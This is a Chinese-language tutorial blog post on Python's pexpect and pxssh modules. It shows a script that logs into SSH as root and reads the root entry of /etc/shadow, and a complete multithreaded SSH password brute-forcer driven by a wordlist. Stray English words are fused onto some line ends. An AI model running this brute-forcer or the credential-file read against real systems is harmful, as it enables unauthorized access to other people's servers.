Pexpect 模塊登陸ssh以及pxssh模塊暴力破解ssh密碼
利用Pexpect模塊交互
這裏centos系統python
代碼
# -*- coding: utf-8 -*-
# @Author : Lan126
import pexpect
PROMPT = ["# ", ">>> ", "> ", "\$ "]
def connect(user, host, password):
ssh_newkey = "Are you sure you want to continue connecting"
connStr = "ssh " + user + "@" + host
child = pexpect.spawn(connStr)
ret = child.expect([pexpect.TIMEOUT, ssh_newkey, "[p|P]assword:"])
if ret == 0:
print("[-] Error Connecting")
return
if ret == 1:
child.sendline("yes")
ret = child.expect([pexpect.TIMEOUT, "[p|P]assword:"])
if ret == 0:
print("[-] Error Connecting")
return
child.sendline(password)
child.expect(PROMPT)
return child
def send_command(child, cmd):
child.sendline(cmd)
child.expect(PROMPT)
print((child.before).encode("utf-8"))
def main():
host = "localhost"
user = "root"
password = "*************************"
child = connect(user, host, password)
send_command(child, "cat /etc/shadow | grep root")
if __name__ == "__main__":
main()
結果圖
細節
下面是從Pexpect文檔中複製的一句話基本上能夠歸納這一個腳本的全部知識點了express
There are two important methods in Pexpect – expect() and send() (or sendline() which is like send() with a linefeed).
The expect() method waits for the child application to return a given string. The string you specify is a regular expression,
so you can match complicated patterns. The send() method writes a string to the child application.
From the child’s point of view it looks just like someone typed the text from a terminal.
After each call to expect() the before and after properties will be set to the text printed by child application.
The before property will contain all text up to the expected string pattern. The after string will contain the text that was matched by the expected patterncentos
spawnclass的做用以下app
This is the main class interface for Pexpect. Use this class to start and control child applications.ssh
利用pxssh暴力破解ssh密碼
這裏也是centos系統xss
代碼
# -*- coding: utf-8 -*-
# @Author : Lan126
import optparse
from pexpect import pxssh
import time
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0
def connect(host, user, password, release):
global Found
global Fails
try:
s = pxssh.pxssh()
s.login(host, user, password)
print("[+] Password Found " + password)
Found = True
except Exception as e:
if "read_nonblocking" in str(e):
Fails += 1
time.sleep(5)
connect(host, user, password, False)
elif "synchronize with original prompt" in str(e):
time.sleep(1)
connect(host, user, password, False)
finally:
if release:
connection_lock.release()
def main():
parser = optparse.OptionParser("usage%prog" + "-H <target host> -u <user> -F <password list>")
parser.add_option("-H", dest="tgtHost", type="string", help="specify target host")
parser.add_option("-u", dest="user", type="string", help="specify the user")
parser.add_option("-F", dest="passwordFile", type="string", help="specify password file")
options, args = parser.parse_args()
host = options.tgtHost
passwdFile = options.passwordFile
user = options.user
if host is None or passwdFile is None or user is None:
print(parser.usage)
exit(0)
fn = open(passwdFile, "r")
for line in fn.readlines():
if Found:
# 若是發現了密碼就退出
print("[*] Exiting: Password Found")
exit(0)
if Fails > 5:
print("[!] Too Many Socket Timeouts")
exit(0)
connection_lock.acquire()
password = line.strip("\r").strip("\n")
print("[-] Testing: " + str(password))
t = Thread(target=connect, args=(host, user, password, True))
t.start()
if __name__ == "__main__":
main()
結果圖
細節
這其實也是上面那個腳本的更高級的封裝不過就是加了一個讀取密碼文件的過程而已
這一個腳本的知識點有全局變量,信號量,以及pxssh模塊的使用,它能夠直接用login()等函數與ssh交互
BoundedSemaphore類瞭解一下函數
A bounded semaphore implementation. Inherit from Semaphore.
This raises ValueError in release() if it would increase the value above the initial value.ui
- 1. python—用Pxssh暴力破解SSH密碼
- 2. python3 暴力破解SSH密碼
- 3. Linux 系統防止ssh登陸密碼的暴力破解
- 4. python自動登陸SSH(暴力破解局網LINUX服務器登陸密碼)
- 5. 防止ssh暴力破解linux密碼
- 6. ssh暴力破解
- 7. linux防暴力破解登陸密碼
- 8. 2.ssh**登陸(ssh無密碼登陸)
- 9. Java SSH框架登陸註冊模塊
- 10. fail2ban防暴力破解-ssh防爆力登陸
- 更多相關文章...
- • Lua 模塊與包 - Lua 教程
- • DTD - XML 構建模塊 - DTD 教程
- • 委託模式
- • Flink 數據傳輸及反壓詳解
-
每一个你不满意的现在,都有一个你没有努力的曾经。